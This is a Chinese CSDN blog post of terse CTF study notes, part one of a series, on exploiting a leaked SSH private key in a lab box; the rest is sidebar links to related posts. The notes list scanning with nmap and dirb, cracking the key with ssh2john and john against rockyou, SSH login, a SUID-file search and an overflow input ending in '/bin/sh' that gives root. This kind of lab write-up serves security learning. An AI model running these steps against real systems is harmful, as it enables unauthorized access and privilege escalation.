我的CTF学习与教学之旅笔记

最新推荐文章于 2021-03-13 21:46:26 发布
最新推荐文章于 2021-03-13 21:46:26 发布
阅读量212 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/105265932
版权

持续更新

1.SSH私钥泄露

nmap -sV -n -v -p -oX

dirb url

发现:robot.txt

浏览查找敏感信息

下载id_rsa \ authoriazed_keys

可发现目标用户名

ssh -i id_rsa username@IP

chmod 600 id_rsa

ssh2john id_rsa > rsacreack

zcat rockyou.gz | john --pipe --rules rsacrack

发在ssh密码,登录

cd /root

ls

cat read_message.c

查找系统中具有root权限的文件:find / -perm 4000 2>/dev/null

发现:

利用漏出漏洞:SimonAAAAAAAAAAAAA/bin/sh

获得root权限

 

 

花纵酒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
我的ctf刷题wp笔记
03-25
我的ctf刷题wp笔记
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
CTF训练笔记(一)- SSH私钥泄露
morrino的博客
01-07 1834
本文作为CTF训练笔记系列的第一章,详细描述了搭建环境时如何配置网络。 总结:细节非常重要,flag往往会藏在意想不到的地方,不要放过任何可疑文件,根据提示逐步挖掘所需信息。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
我的CTF学习教学之旅笔记14
lm19770429的专栏
04-10 325
命令注入: 查找一切可以浏览的页面,一定要浏览源码,可能发现密码 找到一个网站上的文件backup.zip,解压,密码可以参考刚浏览到的密码 一般解压出来的mp3文件不一定是mp3文件,用file 文件名,查看文件类型,一般是文本文件 cat 这个文件,了解详细内容 根据网站名称,searchsploit 查找相关漏洞说明 利用burpsuite:proxy、 repeater ...
我的CTF学习教学之旅笔记15
lm19770429的专栏
04-12 375
CTF综合测试:
我的CTF学习教学之旅笔记16
lm19770429的专栏
04-12 162
综合测试(高难度内核提权)
我的CTF学习教学之旅笔记2
lm19770429的专栏
04-07 159
2.ssh的root提权 nmap dirb 查看web应用目录,找到怪异文件,VDdasdsafqebferq12312423146509765.txt>id_rsa 通过网站联系方式,猜测用户名,登录 查看/etc/passwd /etc/crontab发现用户名,进行渗透 找到定时任务,进行代码反射-------难点:socket编程、 import pty git cl...
我的CTF学习教学之旅笔记4
lm19770429的专栏
04-07 713
经验: nmap -p- T4 IP 可以扫描到未知端口 nmap -A -vT IP 快速扫描
我的CTF学习教学之旅笔记11
lm19770429的专栏
04-08 342
路径遍历(提权root权限)web安全提权
我的CTF学习教学之旅笔记8
lm19770429的专栏
04-07 188
ssl注入
我的CTF学习教学之旅笔记5
lm19770429的专栏
04-07 188
sql注入之get
CTF笔记.one
05-06
CTF笔记,注意是.one格式,面详细记录了很多笔记,希望对各位学习有帮助!
网络安全与CTF在线学习资源
05-18
面整理了各个综合学习平台的网址,和各个比较靠谱的博客网址等等,有安全学习的朋友可以下载看看!
CTF入门笔记(请大家看看)
02-25
CTF入门笔记(请大家看看)
常用的一些安全相关网站汇总
lm19770429的专栏
04-15 1887
关于渗透测试: OWASP项目地址:https://owasp.org/projects/ owasp测试指南:https://owasp.org/www-project-web-security-testing-guide/ owasp开发指南:
关于常见的字符编码汇总
lm19770429的专栏
03-13 474
HTML URL 字符编码 URL 编码会将字符转换为可通过因特网传输的格式。 URL 编码 URL 只能使用ASCII码来通过因特网进行发送。 由于 URL 常常会包含 ASCII 集合之外的字符,URL 必须转换为有效的 ASCII 格式。 URL 编码使用 "%" 其后跟随两位的十六进制数来替换非 ASCII 字符。 URL 不能包含空格。URL 编码通常使用 + 来替换空格。 如需完整的 URL 编码参考,https://www.w3school.com.cn/tags/html.
我的CTF学习教学之旅笔记9,附有常见字符的Url编码列表
lm19770429的专栏
04-07 405
目录遍历(拿到www-data用户权限)
2017年版《 OWASP Top 10》要点解读
lm19770429的专栏
07-26 377
ctf+nodejs学习
最新发布
12-13
如果你想学习CTF和Node.js,可以参考以下资源: 1. CTF Wiki:https://ctf-wiki.github.io/ctf-wiki/ 2. Node.js官方文档:https://nodejs.org/en/docs/ 3. Node.js安全指南:https://nodesecroadmap.fyi/ 4. Node....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值